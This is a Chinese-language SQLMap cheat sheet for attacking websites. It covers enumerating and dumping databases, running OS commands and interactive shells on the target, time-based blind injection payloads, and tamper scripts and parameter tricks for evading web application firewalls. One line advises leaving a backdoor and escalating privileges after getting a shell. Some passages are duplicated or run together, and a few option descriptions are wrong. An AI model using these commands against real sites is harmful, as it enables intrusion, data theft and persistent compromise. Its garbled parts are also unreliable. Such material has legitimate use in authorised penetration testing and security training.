1.SQLMap注入指定数据库、操作系统 使用获取数据库信息，主要使用的命令包括如下几条：

（1）指定网页的数据库、操作系统  --dbms mysql5.0 --current-db

（2）获取当前库名 --current-db

（3）获取该库中的表名-D “数据库名”--tables

（4）获取该库中的列名-D “列名”-T “表名” --columns

（5）获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump

2.SQLMap之交互式写shell及命令执行 

运行任意操作系统命令 :

---

执行系统命令(windows系统)： --os-cmd 

python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig

sqlmap 支持模拟 shell 输入，你可以输入任意命令以执行。对应的选项是 --os-shell，并且和 --sql-shell 一样，具备 TAB 补全和记录历史命令的功能。

执行shell： --os-shell

python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --os-shell

---

使用获取数据库信息，主要使用的命令包括如下几条：

（1）进行交互式写shell及命令执行 -p id  ==> --os-shell

（2）获取当前库名 --current-db

（3）获取该库中的表名-D “数据库名”--tables

（4）获取该库中的列名-D “列名”-T “表名” --columns

（5）获取该库中的某个列名的字段内容 -D “列名” -T “表名” -C “列名” --dump

python sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfigpython sqlmap/sqlmap.py -u http://www.any.com/show.php?id=33 --os-cmd=ipconfig

sqlmap 支持模拟 shell 输入，你可以输入任意命令以执行。对应的选项是 --os-shell，并且和 --sql-shell 一样，具备 TAB 补全和记录历史命令的功能。

进入shell界面 查看是否有管理员权限并留后门提权

3.伪静态一般URL地址格式：

1. http://test.com/php100/id/1/1

2. http://test.com/php100/id/1.html

非伪静态一般URL地址格式：

http://test.com/php100/test.php?id=1

1.python sqlmap.py -u http://www.any.com/lwcms/35*.html --current-db 在sqlmap中伪静态哪儿存在注入点就加*。使用--current-db参数是用于指定当前命令的输出结果是该网站使用的数据库名称。

4.SQLMap之请求延时注入

所谓延时注入主要针对页面无变化，无法用布尔真假判断，无法报错的情况下注入。延时注入是通过页面返回的时间来判断的，不同的mysql数据库版本，延迟注入语句也不同。

mysql >=5.0的可以使用sleep()进行查询；

mysql<5.0的可以使用benchmark()进行查询。

请求延时注入的核心思想：

 if(payload,sleep(3),1)

即payload正确时，程序暂停3秒。否则立刻执行。

 if(payload,1,sleep(3))

即payload正确时，程序立刻执行，否则暂停3秒。

备注：这里payload是指构造的参数数据。

--technique是用于指定sqlmap注入方式的参数，主要有以下几类：

B: Boolean-based blind SQL injection（布尔型盲注）

E: Error-based SQL injection（报错型注入）

Q：Inline queries injection（内联查询）

U: UNION query SQL injection（联合查询注入）

S: Stacked queries SQL injection（可多语句查询注入/栈查询）

T: Time-based blind SQL injection（基于时间的盲注）

猜数据库

python sqlmap/sqlmap.py -u http://www.any.com/wcms/show.php?id=33 --technique T --time-sec 9 --current-db

(--time-sec参数设定延时时间，默认是5秒)

5. SQLMap之绕过WAF防火墙

1.绕过WAF防火墙的脚本  

sqlmap -u {目标URL} --dbs --batch --flush-session  --tamper=space2hash.py,modsecurityversioned.py

脚本总类:

apostrophemask.py#用utf8代替引号；

equaltolike.py#MSSQL * SQLite中like 代替等号；

greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号；

space2hash.py#空格替换为#号 随机字符串 以及换行符；

apostrophenullencode.py#MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL绕过过滤双引号，替换字符和双引号；

halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论；

space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符；

appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码；

ifnull2ifisnull.py#MySQL，SQLite (possibly)，SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

base64encode.py#用base64编码

space2mssqlhash.py#mssql查询中替换空格

modsecurityversioned.py#(mysql中过滤空格，包含完整的查询版本注释;

常用脚本：space2morehash.py space2hash.py base64encode.py charencode.py

2. 脚本参数组合策略绕过

以mysql绕过为例，

sqlmap -u {目标URL} --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

sqlmap -u {目标URL} --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

--hpp含义是使用 HTTP 参数污染。HTTP 参数污染（HPP）是一种绕过 WAF/IPS/IDS 保护机制（这里有相关介绍）的方法，针对 ASP/IIS 和 ASP.NET/IIS 平台尤其有效。如果你怀疑目标使用了这种保护机制，可以尝试使用此开关以绕过它。

--random-agent 使用随机选定的HTTP User - Agent头

-v #详细的等级(0-6)

0：只显示Python的回溯，错误和关键消息。

1：显示信息和警告消息。

2：显示调试消息。

3：有效载荷注入。

4：显示HTTP请求。

5：显示HTTP响应头。

6：显示HTTP响应页面的内容

--delay 延迟的时间

备注：这些组合策略可以根据注入的反馈信息，及时调整组合策略

--batch：要求不对目标写入

--tamper：使用干预脚本

注意：若不使用3等级无法继续下一步操作。因为WAF可能采用白名单规则，所以对于选择哪种策略，重点是根据-v 3 提示的信息进行判断，可以抓取主流的浏览器的user-agents适当的延时，加上注入字符转换---大小写、空格、字符串、注释、加密等等方式。